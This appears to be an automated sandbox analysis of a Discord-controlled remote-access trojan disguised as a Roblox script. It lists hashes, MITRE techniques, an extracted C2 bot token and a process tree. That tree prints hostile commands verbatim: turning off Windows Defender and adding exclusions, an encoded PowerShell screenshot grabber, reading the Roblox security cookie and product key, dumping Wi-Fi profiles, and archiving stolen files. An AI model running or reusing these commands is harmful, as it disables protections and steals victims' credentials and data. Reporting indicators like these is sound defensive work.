Analysis

  • max time kernel
    148s
  • max time network
    150s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20240508-en
  • resource tags

    arch:x64arch:x86image:win10v2004-20240508-enlocale:en-usos:windows10-2004-x64system
  • submitted
    03-06-2024 10:06

General

  • Target

    Robloxscript.exe

  • Size

    6.0MB

  • MD5

    1647c032f8e2c490936d578ae193e799

  • SHA1

    a3c57bc5a1021bd1f34eb3f307208b189c8fd9d4

  • SHA256

    99102d69babf9f72ab79ccb7fa3f3c3f33ff9963300c739557d3de7ec847b36d

  • SHA512

    355cd1e95be9c4bfba6302246e25a4de78e63945261724be54faa1fdd05604614e62eb50cef0dd9b4856074f6ffb7c91c9f3851475c564ddf2fae9fc5c3437b9

  • SSDEEP

    98304:Ur+yFEtdFBgfamaHl3Ne4i3gmtfXJOLhx9fZAzDJ4wzQgsRuGK4R4BMgUd3mszwF:Ur+PFheN/FJMIDJf0gsAGK4R4ug80F

Malware Config

Extracted

Family

discordrat

Attributes
  • discord_token

    MTIzODY2NDMwNzM2NTkwODUyMQ.GDvhgA.XMPH7BZJagiRxu6AdE_1g9HRnMxqmrvHaYqdNA

  • server_id

    1238663060147667046

Signatures

  • Discord RAT

    A RAT written in C# using Discord as a C2.

  • Command and Scripting Interpreter: PowerShell 1 TTPs 4 IoCs

    Using powershell.exe command.

  • Executes dropped EXE 2 IoCs
  • Loads dropped DLL 17 IoCs
  • Reads user/profile data of web browsers 2 TTPs

    Infostealers often target stored browser data, which can include saved credentials etc.

  • UPX packed file 56 IoCs

    Detects executables packed with UPX/modified UPX open source packer.

  • Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
  • Legitimate hosting services abused for malware hosting/C2 1 TTPs 2 IoCs
  • Looks up external IP address via web service 1 IoCs

    Uses a legitimate IP lookup service to find the infected system's external IP.

  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • Detects videocard installed 1 TTPs 1 IoCs

    Uses WMIC.exe to determine videocard installed.

  • Enumerates processes with tasklist 1 TTPs 3 IoCs
  • Gathers system information 1 TTPs 1 IoCs

    Runs systeminfo.exe.

  • Suspicious behavior: EnumeratesProcesses 28 IoCs
  • Suspicious use of AdjustPrivilegeToken 64 IoCs
  • Suspicious use of WriteProcessMemory 64 IoCs

Processes

  • C:\Users\Admin\AppData\Local\Temp\Robloxscript.exe
    "C:\Users\Admin\AppData\Local\Temp\Robloxscript.exe"
    1⤵
    • Suspicious use of WriteProcessMemory
    PID:1544
    • C:\Users\Admin\AppData\Local\Temp\Robloxscript.exe
      "C:\Users\Admin\AppData\Local\Temp\Robloxscript.exe"
      2⤵
      • Loads dropped DLL
      • Suspicious use of WriteProcessMemory
      PID:1200
      • C:\Windows\system32\cmd.exe
        C:\Windows\system32\cmd.exe /c "powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\Robloxscript.exe'"
        3⤵
        • Suspicious use of WriteProcessMemory
        PID:3312
        • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
          powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\Robloxscript.exe'
          4⤵
          • Command and Scripting Interpreter: PowerShell
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of AdjustPrivilegeToken
          PID:2036
      • C:\Windows\system32\cmd.exe
        C:\Windows\system32\cmd.exe /c "powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2 & "%ProgramFiles%\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All"
        3⤵
        • Suspicious use of WriteProcessMemory
        PID:2848
        • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
          powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend
          4⤵
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of AdjustPrivilegeToken
          PID:3124
      • C:\Windows\system32\cmd.exe
        C:\Windows\system32\cmd.exe /c "powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\bound.exe'"
        3⤵
        • Suspicious use of WriteProcessMemory
        PID:5104
        • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
          powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\bound.exe'
          4⤵
          • Command and Scripting Interpreter: PowerShell
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of AdjustPrivilegeToken
          PID:3296
      • C:\Windows\system32\cmd.exe
        C:\Windows\system32\cmd.exe /c "start bound.exe"
        3⤵
        • Suspicious use of WriteProcessMemory
        PID:1148
        • C:\Users\Admin\AppData\Local\Temp\bound.exe
          bound.exe
          4⤵
          • Executes dropped EXE
          • Suspicious use of AdjustPrivilegeToken
          PID:4372
      • C:\Windows\system32\cmd.exe
        C:\Windows\system32\cmd.exe /c "powershell -Command Add-MpPreference -ExclusionPath 'C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\‍  ‎‍.scr'"
        3⤵
        • Suspicious use of WriteProcessMemory
        PID:3108
        • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
          powershell -Command Add-MpPreference -ExclusionPath 'C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\‍  ‎‍.scr'
          4⤵
          • Command and Scripting Interpreter: PowerShell
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of AdjustPrivilegeToken
          PID:1564
      • C:\Windows\system32\cmd.exe
        C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
        3⤵
        • Suspicious use of WriteProcessMemory
        PID:2416
        • C:\Windows\system32\tasklist.exe
          tasklist /FO LIST
          4⤵
          • Enumerates processes with tasklist
          • Suspicious use of AdjustPrivilegeToken
          PID:2304
      • C:\Windows\system32\cmd.exe
        C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
        3⤵
        • Suspicious use of WriteProcessMemory
        PID:4584
        • C:\Windows\system32\tasklist.exe
          tasklist /FO LIST
          4⤵
          • Enumerates processes with tasklist
          • Suspicious use of AdjustPrivilegeToken
          PID:4852
      • C:\Windows\system32\cmd.exe
        C:\Windows\system32\cmd.exe /c "WMIC /Node:localhost /Namespace:\\root\SecurityCenter2 Path AntivirusProduct Get displayName"
        3⤵
        • Suspicious use of WriteProcessMemory
        PID:3228
        • C:\Windows\System32\Wbem\WMIC.exe
          WMIC /Node:localhost /Namespace:\\root\SecurityCenter2 Path AntivirusProduct Get displayName
          4⤵
          • Suspicious use of AdjustPrivilegeToken
          PID:1536
      • C:\Windows\system32\cmd.exe
        C:\Windows\system32\cmd.exe /c "powershell Get-Clipboard"
        3⤵
        • Suspicious use of WriteProcessMemory
        PID:5108
        • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
          powershell Get-Clipboard
          4⤵
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of AdjustPrivilegeToken
          PID:3464
      • C:\Windows\system32\cmd.exe
        C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
        3⤵
        • Suspicious use of WriteProcessMemory
        PID:4120
        • C:\Windows\system32\tasklist.exe
          tasklist /FO LIST
          4⤵
          • Enumerates processes with tasklist
          • Suspicious use of AdjustPrivilegeToken
          PID:3884
      • C:\Windows\system32\cmd.exe
        C:\Windows\system32\cmd.exe /c "tree /A /F"
        3⤵
        • Suspicious use of WriteProcessMemory
        PID:636
        • C:\Windows\system32\tree.com
          tree /A /F
          4⤵
            PID:2956
        • C:\Windows\system32\cmd.exe
          C:\Windows\system32\cmd.exe /c "netsh wlan show profile"
          3⤵
          • Suspicious use of WriteProcessMemory
          PID:2032
          • C:\Windows\system32\netsh.exe
            netsh wlan show profile
            4⤵
              PID:4032
          • C:\Windows\system32\cmd.exe
            C:\Windows\system32\cmd.exe /c "systeminfo"
            3⤵
            • Suspicious use of WriteProcessMemory
            PID:1548
            • C:\Windows\system32\systeminfo.exe
              systeminfo
              4⤵
              • Gathers system information
              PID:1148
          • C:\Windows\system32\cmd.exe
            C:\Windows\system32\cmd.exe /c "powershell.exe -NoProfile -ExecutionPolicy Bypass -EncodedCommand JABzAG8AdQByAGMAZQAgAD0AIABAACIADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtADsADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtAC4AQwBvAGwAbABlAGMAdABpAG8AbgBzAC4ARwBlAG4AZQByAGkAYwA7AA0ACgB1AHMAaQBuAGcAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcAOwANAAoAdQBzAGkAbgBnACAAUwB5AHMAdABlAG0ALgBXAGkAbgBkAG8AdwBzAC4ARgBvAHIAbQBzADsADQAKAA0ACgBwAHUAYgBsAGkAYwAgAGMAbABhAHMAcwAgAFMAYwByAGUAZQBuAHMAaABvAHQADQAKAHsADQAKACAAIAAgACAAcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAEwAaQBzAHQAPABCAGkAdABtAGEAcAA+ACAAQwBhAHAAdAB1AHIAZQBTAGMAcgBlAGUAbgBzACgAKQANAAoAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAdgBhAHIAIAByAGUAcwB1AGwAdABzACAAPQAgAG4AZQB3ACAATABpAHMAdAA8AEIAaQB0AG0AYQBwAD4AKAApADsADQAKACAAIAAgACAAIAAgACAAIAB2AGEAcgAgAGEAbABsAFMAYwByAGUAZQBuAHMAIAA9ACAAUwBjAHIAZQBlAG4ALgBBAGwAbABTAGMAcgBlAGUAbgBzADsADQAKAA0ACgAgACAAIAAgACAAIAAgACAAZgBvAHIAZQBhAGMAaAAgACgAUwBjAHIAZQBlAG4AIABzAGMAcgBlAGUAbgAgAGkAbgAgAGEAbABsAFMAYwByAGUAZQBuAHMAKQANAAoAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHQAcgB5AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAFIAZQBjAHQAYQBuAGcAbABlACAAYgBvAHUAbgBkAHMAIAA9ACAAcwBjAHIAZQBlAG4ALgBCAG8AdQBuAGQAcwA7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHUAcwBpAG4AZwAgACgAQgBpAHQAbQBhAHAAIABiAGkAdABtAGEAcAAgAD0AIABuAGUAdwAgAEIAaQB0AG0AYQBwACgAYgBvAHUAbgBkAHMALgBXAGkAZAB0AGgALAAgAGIAbwB1AG4AZABzAC4ASABlAGkAZwBoAHQAKQApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAB1AHMAaQBuAGcAIAAoAEcAcgBhAHAAaABpAGMAcwAgAGcAcgBhAHAAaABpAGMAcwAgAD0AIABHAHIAYQBwAGgAaQBjAHMALgBGAHIAbwBtAEkAbQBhAGcAZQAoAGIAaQB0AG0AYQBwACkAKQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAGcAcgBhAHAAaABpAGMAcwAuAEMAbwBwAHkARgByAG8AbQBTAGMAcgBlAGUAbgAoAG4AZQB3ACAAUABvAGkAbgB0ACgAYgBvAHUAbgBkAHMALgBMAGUAZgB0ACwAIABiAG8AdQBuAGQAcwAuAFQAbwBwACkALAAgAFAAbwBpAG4AdAAuAEUAbQBwAHQAeQAsACAAYgBvAHUAbgBkAHMALgBTAGkAegBlACkAOwANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAcgBlAHMAdQBsAHQAcwAuAEEAZABkACgAKABCAGkAdABtAGEAcAApAGIAaQB0AG0AYQBwAC4AQwBsAG8AbgBlACgAKQApADsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAYwBhAHQAYwBoACAAKABFAHgAYwBlAHAAdABpAG8AbgApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAC8ALwAgAEgAYQBuAGQAbABlACAAYQBuAHkAIABlAHgAYwBlAHAAdABpAG8AbgBzACAAaABlAHIAZQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAcgBlAHQAdQByAG4AIAByAGUAcwB1AGwAdABzADsADQAKACAAIAAgACAAfQANAAoAfQANAAoAIgBAAA0ACgANAAoAQQBkAGQALQBUAHkAcABlACAALQBUAHkAcABlAEQAZQBmAGkAbgBpAHQAaQBvAG4AIAAkAHMAbwB1AHIAYwBlACAALQBSAGUAZgBlAHIAZQBuAGMAZQBkAEEAcwBzAGUAbQBiAGwAaQBlAHMAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcALAAgAFMAeQBzAHQAZQBtAC4AVwBpAG4AZABvAHcAcwAuAEYAbwByAG0AcwANAAoADQAKACQAcwBjAHIAZQBlAG4AcwBoAG8AdABzACAAPQAgAFsAUwBjAHIAZQBlAG4AcwBoAG8AdABdADoAOgBDAGEAcAB0AHUAcgBlAFMAYwByAGUAZQBuAHMAKAApAA0ACgANAAoADQAKAGYAbwByACAAKAAkAGkAIAA9ACAAMAA7ACAAJABpACAALQBsAHQAIAAkAHMAYwByAGUAZQBuAHMAaABvAHQAcwAuAEMAbwB1AG4AdAA7ACAAJABpACsAKwApAHsADQAKACAAIAAgACAAJABzAGMAcgBlAGUAbgBzAGgAbwB0ACAAPQAgACQAcwBjAHIAZQBlAG4AcwBoAG8AdABzAFsAJABpAF0ADQAKACAAIAAgACAAJABzAGMAcgBlAGUAbgBzAGgAbwB0AC4AUwBhAHYAZQAoACIALgAvAEQAaQBzAHAAbABhAHkAIAAoACQAKAAkAGkAKwAxACkAKQAuAHAAbgBnACIAKQANAAoAIAAgACAAIAAkAHMAYwByAGUAZQBuAHMAaABvAHQALgBEAGkAcwBwAG8AcwBlACgAKQANAAoAfQA="
            3⤵
            • Suspicious use of WriteProcessMemory
            PID:376
            • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
              powershell.exe -NoProfile -ExecutionPolicy Bypass -EncodedCommand JABzAG8AdQByAGMAZQAgAD0AIABAACIADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtADsADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtAC4AQwBvAGwAbABlAGMAdABpAG8AbgBzAC4ARwBlAG4AZQByAGkAYwA7AA0ACgB1AHMAaQBuAGcAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcAOwANAAoAdQBzAGkAbgBnACAAUwB5AHMAdABlAG0ALgBXAGkAbgBkAG8AdwBzAC4ARgBvAHIAbQBzADsADQAKAA0ACgBwAHUAYgBsAGkAYwAgAGMAbABhAHMAcwAgAFMAYwByAGUAZQBuAHMAaABvAHQADQAKAHsADQAKACAAIAAgACAAcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAEwAaQBzAHQAPABCAGkAdABtAGEAcAA+ACAAQwBhAHAAdAB1AHIAZQBTAGMAcgBlAGUAbgBzACgAKQANAAoAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAdgBhAHIAIAByAGUAcwB1AGwAdABzACAAPQAgAG4AZQB3ACAATABpAHMAdAA8AEIAaQB0AG0AYQBwAD4AKAApADsADQAKACAAIAAgACAAIAAgACAAIAB2AGEAcgAgAGEAbABsAFMAYwByAGUAZQBuAHMAIAA9ACAAUwBjAHIAZQBlAG4ALgBBAGwAbABTAGMAcgBlAGUAbgBzADsADQAKAA0ACgAgACAAIAAgACAAIAAgACAAZgBvAHIAZQBhAGMAaAAgACgAUwBjAHIAZQBlAG4AIABzAGMAcgBlAGUAbgAgAGkAbgAgAGEAbABsAFMAYwByAGUAZQBuAHMAKQANAAoAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHQAcgB5AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAFIAZQBjAHQAYQBuAGcAbABlACAAYgBvAHUAbgBkAHMAIAA9ACAAcwBjAHIAZQBlAG4ALgBCAG8AdQBuAGQAcwA7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHUAcwBpAG4AZwAgACgAQgBpAHQAbQBhAHAAIABiAGkAdABtAGEAcAAgAD0AIABuAGUAdwAgAEIAaQB0AG0AYQBwACgAYgBvAHUAbgBkAHMALgBXAGkAZAB0AGgALAAgAGIAbwB1AG4AZABzAC4ASABlAGkAZwBoAHQAKQApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAB1AHMAaQBuAGcAIAAoAEcAcgBhAHAAaABpAGMAcwAgAGcAcgBhAHAAaABpAGMAcwAgAD0AIABHAHIAYQBwAGgAaQBjAHMALgBGAHIAbwBtAEkAbQBhAGcAZQAoAGIAaQB0AG0AYQBwACkAKQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAGcAcgBhAHAAaABpAGMAcwAuAEMAbwBwAHkARgByAG8AbQBTAGMAcgBlAGUAbgAoAG4AZQB3ACAAUABvAGkAbgB0ACgAYgBvAHUAbgBkAHMALgBMAGUAZgB0ACwAIABiAG8AdQBuAGQAcwAuAFQAbwBwACkALAAgAFAAbwBpAG4AdAAuAEUAbQBwAHQAeQAsACAAYgBvAHUAbgBkAHMALgBTAGkAegBlACkAOwANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAcgBlAHMAdQBsAHQAcwAuAEEAZABkACgAKABCAGkAdABtAGEAcAApAGIAaQB0AG0AYQBwAC4AQwBsAG8AbgBlACgAKQApADsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAYwBhAHQAYwBoACAAKABFAHgAYwBlAHAAdABpAG8AbgApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAC8ALwAgAEgAYQBuAGQAbABlACAAYQBuAHkAIABlAHgAYwBlAHAAdABpAG8AbgBzACAAaABlAHIAZQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAcgBlAHQAdQByAG4AIAByAGUAcwB1AGwAdABzADsADQAKACAAIAAgACAAfQANAAoAfQANAAoAIgBAAA0ACgANAAoAQQBkAGQALQBUAHkAcABlACAALQBUAHkAcABlAEQAZQBmAGkAbgBpAHQAaQBvAG4AIAAkAHMAbwB1AHIAYwBlACAALQBSAGUAZgBlAHIAZQBuAGMAZQBkAEEAcwBzAGUAbQBiAGwAaQBlAHMAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcALAAgAFMAeQBzAHQAZQBtAC4AVwBpAG4AZABvAHcAcwAuAEYAbwByAG0AcwANAAoADQAKACQAcwBjAHIAZQBlAG4AcwBoAG8AdABzACAAPQAgAFsAUwBjAHIAZQBlAG4AcwBoAG8AdABdADoAOgBDAGEAcAB0AHUAcgBlAFMAYwByAGUAZQBuAHMAKAApAA0ACgANAAoADQAKAGYAbwByACAAKAAkAGkAIAA9ACAAMAA7ACAAJABpACAALQBsAHQAIAAkAHMAYwByAGUAZQBuAHMAaABvAHQAcwAuAEMAbwB1AG4AdAA7ACAAJABpACsAKwApAHsADQAKACAAIAAgACAAJABzAGMAcgBlAGUAbgBzAGgAbwB0ACAAPQAgACQAcwBjAHIAZQBlAG4AcwBoAG8AdABzAFsAJABpAF0ADQAKACAAIAAgACAAJABzAGMAcgBlAGUAbgBzAGgAbwB0AC4AUwBhAHYAZQAoACIALgAvAEQAaQBzAHAAbABhAHkAIAAoACQAKAAkAGkAKwAxACkAKQAuAHAAbgBnACIAKQANAAoAIAAgACAAIAAkAHMAYwByAGUAZQBuAHMAaABvAHQALgBEAGkAcwBwAG8AcwBlACgAKQANAAoAfQA=
              4⤵
              • Command and Scripting Interpreter: PowerShell
              • Suspicious behavior: EnumeratesProcesses
              • Suspicious use of AdjustPrivilegeToken
              PID:1016
              • C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
                "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\qtkgtujt\qtkgtujt.cmdline"
                5⤵
                  PID:1452
                  • C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
                    C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES57C5.tmp" "c:\Users\Admin\AppData\Local\Temp\qtkgtujt\CSCFF4F09E28D9F4DF6B63B5641A50CAA.TMP"
                    6⤵
                      PID:5108
              • C:\Windows\system32\cmd.exe
                C:\Windows\system32\cmd.exe /c "tree /A /F"
                3⤵
                • Suspicious use of WriteProcessMemory
                PID:1420
                • C:\Windows\system32\tree.com
                  tree /A /F
                  4⤵
                    PID:4752
                • C:\Windows\system32\cmd.exe
                  C:\Windows\system32\cmd.exe /c "tree /A /F"
                  3⤵
                    PID:680
                    • C:\Windows\system32\tree.com
                      tree /A /F
                      4⤵
                        PID:444
                    • C:\Windows\system32\cmd.exe
                      C:\Windows\system32\cmd.exe /c "tree /A /F"
                      3⤵
                        PID:3144
                        • C:\Windows\System32\Conhost.exe
                          \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                          4⤵
                            PID:3228
                          • C:\Windows\system32\tree.com
                            tree /A /F
                            4⤵
                              PID:1620
                          • C:\Windows\system32\cmd.exe
                            C:\Windows\system32\cmd.exe /c "tree /A /F"
                            3⤵
                              PID:4228
                              • C:\Windows\system32\tree.com
                                tree /A /F
                                4⤵
                                  PID:1376
                              • C:\Windows\system32\cmd.exe
                                C:\Windows\system32\cmd.exe /c "tree /A /F"
                                3⤵
                                  PID:3464
                                  • C:\Windows\system32\tree.com
                                    tree /A /F
                                    4⤵
                                      PID:2440
                                  • C:\Windows\system32\cmd.exe
                                    C:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY"
                                    3⤵
                                      PID:4228
                                      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                        powershell Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
                                        4⤵
                                        • Suspicious behavior: EnumeratesProcesses
                                        • Suspicious use of AdjustPrivilegeToken
                                        PID:728
                                    • C:\Windows\system32\cmd.exe
                                      C:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path HKLM:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY"
                                      3⤵
                                        PID:1440
                                        • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                          powershell Get-ItemPropertyValue -Path HKLM:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
                                          4⤵
                                          • Suspicious behavior: EnumeratesProcesses
                                          • Suspicious use of AdjustPrivilegeToken
                                          PID:1528
                                      • C:\Windows\system32\cmd.exe
                                        C:\Windows\system32\cmd.exe /c "getmac"
                                        3⤵
                                          PID:2848
                                          • C:\Windows\system32\getmac.exe
                                            getmac
                                            4⤵
                                              PID:4220
                                          • C:\Windows\system32\cmd.exe
                                            C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\_MEI15442\rar.exe a -r -hp"skid" "C:\Users\Admin\AppData\Local\Temp\aXejn.zip" *"
                                            3⤵
                                              PID:1836
                                              • C:\Users\Admin\AppData\Local\Temp\_MEI15442\rar.exe
                                                C:\Users\Admin\AppData\Local\Temp\_MEI15442\rar.exe a -r -hp"skid" "C:\Users\Admin\AppData\Local\Temp\aXejn.zip" *
                                                4⤵
                                                • Executes dropped EXE
                                                PID:860
                                            • C:\Windows\system32\cmd.exe
                                              C:\Windows\system32\cmd.exe /c "wmic os get Caption"
                                              3⤵
                                                PID:2704
                                                • C:\Windows\System32\Wbem\WMIC.exe
                                                  wmic os get Caption
                                                  4⤵
                                                  • Suspicious use of AdjustPrivilegeToken
                                                  PID:2516
                                              • C:\Windows\system32\cmd.exe
                                                C:\Windows\system32\cmd.exe /c "wmic computersystem get totalphysicalmemory"
                                                3⤵
                                                  PID:2244
                                                  • C:\Windows\System32\Wbem\WMIC.exe
                                                    wmic computersystem get totalphysicalmemory
                                                    4⤵
                                                      PID:3684
                                                  • C:\Windows\system32\cmd.exe
                                                    C:\Windows\system32\cmd.exe /c "wmic csproduct get uuid"
                                                    3⤵
                                                      PID:1132
                                                      • C:\Windows\System32\Wbem\WMIC.exe
                                                        wmic csproduct get uuid
                                                        4⤵
                                                          PID:3160
                                                      • C:\Windows\system32\cmd.exe
                                                        C:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path 'HKLM:System\CurrentControlSet\Control\Session Manager\Environment' -Name PROCESSOR_IDENTIFIER"
                                                        3⤵
                                                          PID:4892
                                                          • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                            powershell Get-ItemPropertyValue -Path 'HKLM:System\CurrentControlSet\Control\Session Manager\Environment' -Name PROCESSOR_IDENTIFIER
                                                            4⤵
                                                            • Suspicious behavior: EnumeratesProcesses
                                                            PID:4304
                                                        • C:\Windows\system32\cmd.exe
                                                          C:\Windows\system32\cmd.exe /c "wmic path win32_VideoController get name"
                                                          3⤵
                                                            PID:548
                                                            • C:\Windows\System32\Wbem\WMIC.exe
                                                              wmic path win32_VideoController get name
                                                              4⤵
                                                              • Detects videocard installed
                                                              PID:4744
                                                          • C:\Windows\system32\cmd.exe
                                                            C:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion\SoftwareProtectionPlatform' -Name BackupProductKeyDefault"
                                                            3⤵
                                                              PID:2752
                                                              • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                powershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion\SoftwareProtectionPlatform' -Name BackupProductKeyDefault
                                                                4⤵
                                                                • Suspicious behavior: EnumeratesProcesses
                                                                PID:640

                                                        Network

                                                        MITRE ATT&CK Matrix ATT&CK v13

                                                        Execution

                                                        Command and Scripting Interpreter

                                                        1
                                                        T1059

                                                        PowerShell

                                                        1
                                                        T1059.001

                                                        Credential Access

                                                        Unsecured Credentials

                                                        2
                                                        T1552

                                                        Credentials In Files

                                                        2
                                                        T1552.001

                                                        Discovery

                                                        System Information Discovery

                                                        3
                                                        T1082

                                                        Process Discovery

                                                        1
                                                        T1057

                                                        Collection

                                                        Data from Local System

                                                        2
                                                        T1005

                                                        Command and Control

                                                        Web Service

                                                        1
                                                        T1102

                                                        Replay Monitor

                                                        Loading Replay Monitor...

                                                        Downloads

                                                        • C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log
                                                          Filesize

                                                          3KB

                                                          MD5

                                                          1e5a8b0b3a77e5341e49b8d561b15071

                                                          SHA1

                                                          adae921de44e54ae70f3efd7e7d1b3cb64a0fa91

                                                          SHA256

                                                          4e8440afb8d5e0b93eb84058da7414529ad479456f1e9efad2f9152fd8fc5958

                                                          SHA512

                                                          27460facc63380398b4df11b699a1f0392c69f5b94e81f2a375512bf123b963d368ce3887d26372094b76b584129c6e7ac7e9a3450a4cf94cca6ad1a5cea2c10

                                                        • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
                                                          Filesize

                                                          944B

                                                          MD5

                                                          cadef9abd087803c630df65264a6c81c

                                                          SHA1

                                                          babbf3636c347c8727c35f3eef2ee643dbcc4bd2

                                                          SHA256

